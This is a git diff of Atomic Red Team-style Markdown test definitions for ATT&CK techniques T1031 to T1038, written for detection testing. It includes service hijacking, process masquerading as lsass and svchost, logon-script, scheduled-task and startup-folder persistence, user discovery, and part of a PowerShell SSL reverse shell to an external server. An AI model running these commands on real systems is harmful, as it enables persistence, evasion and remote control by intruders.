Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). -Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. +Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom +tools to interact with the Windows API. Use of existing services is a type +of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. +Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not +commonly used. -Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)
+Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: +Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013) ## Atomic Tests - [Atomic Test #1 - Modify Fax service to run PowerShell](#atomic-test-1---modify-fax-service-to-run-powershell) -
## Atomic Test #1 - Modify Fax service to run PowerShell + This test will temporarily modify the service Fax by changing the binPath to PowerShell and will then revert the binPath change, restoring Fax to its original state. @@ -21,12 +28,7 @@ Upon successful execution, cmd will modify the binpath for `Fax` to spawn powers **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\"" @@ -34,12 +36,9 @@ sc start Fax ``` #### Cleanup Commands: + ```cmd sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1 ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1032.md b/Atomic_Threat_Coverage/Triggers/T1032.md
index 08b6e2bb..3de1a9d6 100644
--- a/Atomic_Threat_Coverage/Triggers/T1032.md
+++ b/Atomic_Threat_Coverage/Triggers/T1032.md
@@ -1,15 +1,17 @@
# T1032 - Standard Cryptographic Protocol + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1032) +
Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.
## Atomic Tests - [Atomic Test #1 - OpenSSL C2](#atomic-test-1---openssl-c2) -
## Atomic Test #1 - OpenSSL C2 + Thanks to @OrOneEqualsOne for this quick C2 method. This is to test to see if a C2 session can be established using an SSL socket. More information about this technique, including how to set up the listener, can be found here: @@ -19,18 +21,14 @@ Upon successful execution, powershell will make a network connection to 127.0.0. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | server_ip | IP of the external server | String | 127.0.0.1| | server_port | The port to connect to on the external server | String | 443| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell $server_ip = #{server_ip} @@ -51,9 +49,4 @@ $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1033.md b/Atomic_Threat_Coverage/Triggers/T1033.md
index 276e9ab1..e9c83955 100644
--- a/Atomic_Threat_Coverage/Triggers/T1033.md
+++ b/Atomic_Threat_Coverage/Triggers/T1033.md
@@ -1,8 +1,17 @@
# T1033 - System Owner/User Discovery + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1033) +
### Windows -Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. +Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a +system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames +or by using [Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a +number of different ways using other Discovery techniques, because user and username details are prevalent throughout a +system and include running process ownership, file/directory ownership, session information, and system logs. +Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during +automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or +attempts specific actions. ### Mac @@ -18,28 +27,25 @@ On Linux, the currently logged in user can be identified with w and - [Atomic Test #2 - System Owner/User Discovery](#atomic-test-2---system-owneruser-discovery) -
## Atomic Test #1 - System Owner/User Discovery + Identify System owner or users on an endpoint. -Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. +Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will +be via stdout. Additionally, two files will be written to disk - computers.txt and usernames.txt. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | computer_name | Name of remote computer | string | localhost| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd cmd.exe /C whoami @@ -52,27 +58,18 @@ for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active @FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt ``` - - - - -

## Atomic Test #2 - System Owner/User Discovery + Identify System owner or users on an endpoint Upon successful execution, sh will stdout list of usernames. **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh users @@ -80,9 +77,4 @@ w who ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1035.md b/Atomic_Threat_Coverage/Triggers/T1035.md
index 0d1ec129..67e093c8 100644
--- a/Atomic_Threat_Coverage/Triggers/T1035.md
+++ b/Atomic_Threat_Coverage/Triggers/T1035.md
@@ -1,5 +1,7 @@
# T1035 - Service Execution + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1035) +
Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [New Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.
## Atomic Tests
@@ -8,28 +10,26 @@ - [Atomic Test #2 - Use PsExec to execute a command on a remote host](#atomic-test-2---use-psexec-to-execute-a-command-on-a-remote-host) -
## Atomic Test #1 - Execute a Command as a Service -Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly. - -Upon successful execution, cmd.exe create a new service using sc.exe create that will start powershell.exe to create a new file `art-marker.txt` - -**Supported Platforms:** Windows +Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the +service will report that it did not start correctly even when code executes properly. +Upon successful execution, cmd.exe create a new service using sc.exe create that will start powershell.exe to create a +new file `art-marker.txt` +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | service_name | Name of service to create | string | ARTService| | executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd sc.exe create #{service_name} binPath= #{executable_command} @@ -37,49 +37,44 @@ sc.exe start #{service_name} sc.exe delete #{service_name} ``` - - - - -

## Atomic Test #2 - Use PsExec to execute a command on a remote host + Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments Will run a command on a remote host. -Upon successful execution, powershell will download psexec.exe and spawn calc.exe on a remote endpoint (default:localhost). +Upon successful execution, powershell will download psexec.exe and spawn calc.exe on a remote endpoint (default: +localhost). **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | psexec_exe | Path to PsExec | string | C:\PSTools\PsExec.exe| | remote_host | Remote hostname or IP address | string | localhost| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell #{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe" ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) + ##### Check Prereq Commands: + ```powershell if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} ``` + ##### Get Prereq Commands: + ```powershell Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -87,7 +82,4 @@ New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1036.md b/Atomic_Threat_Coverage/Triggers/T1036.md
index 9aed0704..51580a25 100644
--- a/Atomic_Threat_Coverage/Triggers/T1036.md
+++ b/Atomic_Threat_Coverage/Triggers/T1036.md
@@ -1,22 +1,49 @@
# T1036 - Masquerading -## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1036) -
Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed. -One variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate. +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1036) -A third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver file named March 25 \u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\u202Egnp.js will be displayed as photo_high_resj.png. A common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. 
Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.  +
Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed. -Adversaries may modify a binary's metadata, including such fields as icons, version, name of the product, description, and copyright, to better blend in with the environment and increase chances of deceiving a security analyst or product.(Citation: Threatexpress MetaTwin 2017) +One variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted +program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. +An example of this is when a common system utility or program is moved and renamed to avoid detection based on its +usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or +path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name +with something that is thought to be legitimate. + +A third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into +executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that +causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a +Windows screensaver file named March 25 \u202Excod.scr will display as March 25 rcs.docx. A +JavaScript file named photo_high_re\u202Egnp.js will be displayed as photo_high_resj.png. A +common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they +are not aware of how their tools display and render the RTLO character. 
Use of the RTLO character has been seen in many +targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber +Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the +command line tool reg.exe does not by default. + +Adversaries may modify a binary's metadata, including such fields as icons, version, name of the product, description, +and copyright, to better blend in with the environment and increase chances of deceiving a security analyst or product.( +Citation: Threatexpress MetaTwin 2017) ### Windows -In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke) -An example of abuse of trusted locations in Windows would be the C:\Windows\System32 directory. Examples of trusted binary names that can be given to malicious binares include "explorer.exe" and "svchost.exe". +In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as +rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a +different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. ( +Citation: F-Secure CozyDuke) + +An example of abuse of trusted locations in Windows would be the C:\Windows\System32 directory. Examples of +trusted binary names that can be given to malicious binares include "explorer.exe" and "svchost.exe". 
### Linux -Another variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten) -An example of abuse of trusted locations in Linux would be the /bin directory. Examples of trusted binary names that can be given to malicious binaries include "rsyncd" and "dbus-inotifier". (Citation: Fysbis Palo Alto Analysis) (Citation: Fysbis Dr Web Analysis)
+Another variation of this technique includes malicious binaries changing the name of their running process to that of a +trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten) + +An example of abuse of trusted locations in Linux would be the /bin directory. Examples of trusted binary +names that can be given to malicious binaries include "rsyncd" and "dbus-inotifier". (Citation: Fysbis Palo Alto +Analysis) (Citation: Fysbis Dr Web Analysis)
## Atomic Tests @@ -36,22 +63,18 @@ An example of abuse of trusted locations in Linux would be the /bin ## Atomic Test #1 - Masquerading as Windows LSASS process + Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. -Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session +Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second +timeout cancels the session **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe @@ -59,57 +82,41 @@ copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe ``` #### Cleanup Commands: + ```cmd del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 ``` - - - -

## Atomic Test #2 - Masquerading as Linux crond process. + Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon. Upon successful execution, sh is renamed to `crond` and executed. **Supported Platforms:** Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh cp /bin/sh /tmp/crond /tmp/crond ``` - - - - -

## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe + Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. Upon successful execution, cscript.exe is renamed as notepad.exe and executed from non-standard path. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y @@ -117,30 +124,23 @@ cmd.exe /c %APPDATA%\notepad.exe /B ``` #### Cleanup Commands: + ```cmd del /Q /F %APPDATA%\notepad.exe >nul 2>&1 ``` - - - -

## Atomic Test #4 - Masquerading - wscript.exe running as svchost.exe + Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe. Upon execution, no windows will remain open but wscript will have been renamed to svchost and ran out of the temp folder **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y @@ -148,30 +148,23 @@ cmd.exe /c %APPDATA%\svchost.exe /B ``` #### Cleanup Commands: + ```cmd del /Q /F %APPDATA%\svchost.exe >nul 2>&1 ``` - - - -

## Atomic Test #5 - Masquerading - powershell.exe running as taskhostw.exe + Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe. Upon successful execution, powershell.exe is renamed as taskhostw.exe and executed from non-standard path. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y @@ -179,36 +172,30 @@ cmd.exe /K %APPDATA%\taskhostw.exe ``` #### Cleanup Commands: + ```cmd del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 ``` - - - -

## Atomic Test #6 - Masquerading - non-windows exe running as windows exe + Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe Upon successful execution, powershell will execute T1036.exe as svchost.exe from on a non-standard path. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | inputfile | path of file to copy | path | PathToAtomicsFolder\T1036\bin\t1036.exe| | outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell copy #{inputfile} #{outputfile} @@ -217,47 +204,45 @@ Stop-Process -ID $myT1036 ``` #### Cleanup Commands: + ```powershell Remove-Item #{outputfile} -Force -ErrorAction Ignore ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Exe file to copy must exist on disk at specified location (#{inputfile}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{inputfile}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/t1036.exe" -OutFile "#{inputfile}" ``` - - -

## Atomic Test #7 - Masquerading - windows exe running as different windows exe + Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | inputfile | path of file to copy | path | $env:ComSpec| | outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell copy #{inputfile} #{outputfile} @@ -266,18 +251,16 @@ Stop-Process -ID $myT1036 ``` #### Cleanup Commands: + ```powershell Remove-Item #{outputfile} -Force -ErrorAction Ignore ``` - - - -

## Atomic Test #8 - Malicious process Masquerading as LSM.exe + Detect LSM running from an incorrect directory and an incorrect service account This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file to the C:\ folder. @@ -285,12 +268,7 @@ Upon successful execution, cmd.exe will be renamed as lsm.exe and executed from **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd copy C:\Windows\System32\cmd.exe C:\lsm.exe @@ -298,13 +276,10 @@ C:\lsm.exe /c echo T1036 > C:\T1036.txt ``` #### Cleanup Commands: + ```cmd del C:\T1036.txt >nul 2>&1 del C:\lsm.exe >nul 2>&1 ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1037.md b/Atomic_Threat_Coverage/Triggers/T1037.md
index 50139ce9..48a43ceb 100644
--- a/Atomic_Threat_Coverage/Triggers/T1037.md
+++ b/Atomic_Threat_Coverage/Triggers/T1037.md
@@ -1,14 +1,24 @@
 # T1037 - Logon Scripts + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1037) +
### Windows -Windows allows logon scripts to be run whenever a specific user or group of users log into a system. (Citation: TechNet Logon Scripts) The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. +Windows allows logon scripts to be run whenever a specific user or group of users log into a system. (Citation: TechNet +Logon Scripts) The scripts can be used to perform administrative functions, which may often execute other programs or +send information to an internal logging server. -If adversaries can access these scripts, they may insert additional code into the logon script to execute their tools when a user logs in. This code can allow them to maintain persistence on a single system, if it is a local script, or to move laterally within a network, if the script is stored on a central server and pushed to many systems. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. +If adversaries can access these scripts, they may insert additional code into the logon script to execute their tools +when a user logs in. This code can allow them to maintain persistence on a single system, if it is a local script, or to +move laterally within a network, if the script is stored on a central server and pushed to many systems. Depending on +the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. ### Mac -Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root (Citation: creating login hook). There can only be one login hook at a time though. 
If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.
+Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook +tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as +root (Citation: creating login hook). There can only be one login hook at a time though. If adversaries can access these +scripts, they can insert additional code to the script to execute their tools when a user logs in.
## Atomic Tests @@ -24,27 +34,24 @@ Mac allows login and logoff hooks to be run as root whenever a specific user log - [Atomic Test #6 - Supicious bat file run from startup Folder](#atomic-test-6---supicious-bat-file-run-from-startup-folder) -
## Atomic Test #1 - Logon Scripts -Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key + +Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new +environment variable in the HKCU\Environment key that can be viewed in the Registry Editor. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_path | Path to .bat file | String | %temp%\art.bat| | script_command | Command To Execute | String | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037-log.txt| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd echo "#{script_command}" > #{script_path} @@ -52,31 +59,25 @@ REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_pa ``` #### Cleanup Commands: + ```cmd REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1 del #{script_path} >nul 2>&1 del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>&1 ``` - - - -

## Atomic Test #2 - Scheduled Task Startup Script -Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view + +Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled +tasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd schtasks /create /tn "T1037_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" @@ -84,65 +85,52 @@ schtasks /create /tn "T1037_OnStartup" /sc onstart /ru system /tr "cmd.exe /c ca ``` #### Cleanup Commands: + ```cmd schtasks /delete /tn "T1037_OnLogon" /f >nul 2>&1 schtasks /delete /tn "T1037_OnStartup" /f >nul 2>&1 ``` - - - -

## Atomic Test #3 - Logon Scripts - Mac + Mac logon script **Supported Platforms:** macOS +#### Run it with these steps! - - -#### Run it with these steps! 1. Create the required plist file - sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist + sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist 2. Populate the plist with the location of your shell script - sudo defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh + sudo defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh 3. Create the required plist file in the target user's Preferences directory - touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist + touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist 4. Populate the plist with the location of your shell script - defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh - - - - - - + defaults write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh

## Atomic Test #4 - Supicious vbs file run from startup Folder -vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1137 Hello, World VBS!" will be displayed twice. + +vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1137 Hello, World +VBS!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Copy-Item $PathToAtomicsFolder\T1037\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" @@ -152,32 +140,25 @@ cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbssta ``` #### Cleanup Commands: + ```powershell Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore ``` - - - -

## Atomic Test #5 - Supicious jse file run from startup Folder + jse files can be placed in and ran from the startup folder to maintain persistance. -Upon execution, "T1137 Hello, World JSE!" will be displayed twice. +Upon execution, "T1137 Hello, World JSE!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Copy-Item $PathToAtomicsFolder\T1037\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" @@ -187,31 +168,25 @@ cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sta ``` #### Cleanup Commands: + ```powershell Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore ``` - - - -

## Atomic Test #6 - Supicious bat file run from startup Folder + bat files can be placed in and executed from the startup folder to maintain persistance. -Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" +Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env: +APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Copy-Item $PathToAtomicsFolder\T1037\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" @@ -221,13 +196,10 @@ Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\bats ``` #### Cleanup Commands: + ```powershell Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1038.md b/Atomic_Threat_Coverage/Triggers/T1038.md
index 923e61cf..f6cae0dd 100644
--- a/Atomic_Threat_Coverage/Triggers/T1038.md
+++ b/Atomic_Threat_Coverage/Triggers/T1038.md
@@ -1,36 +1,45 @@
 # T1038 - DLL Search Order Hijacking + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1038) +
Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence. -Adversaries may perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft 2269637) Adversaries may use this behavior to cause the program to load a malicious DLL. +Adversaries may perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by +placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before +the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks +occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. ( +Citation: Microsoft 2269637) Adversaries may use this behavior to cause the program to load a malicious DLL. -Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation. 
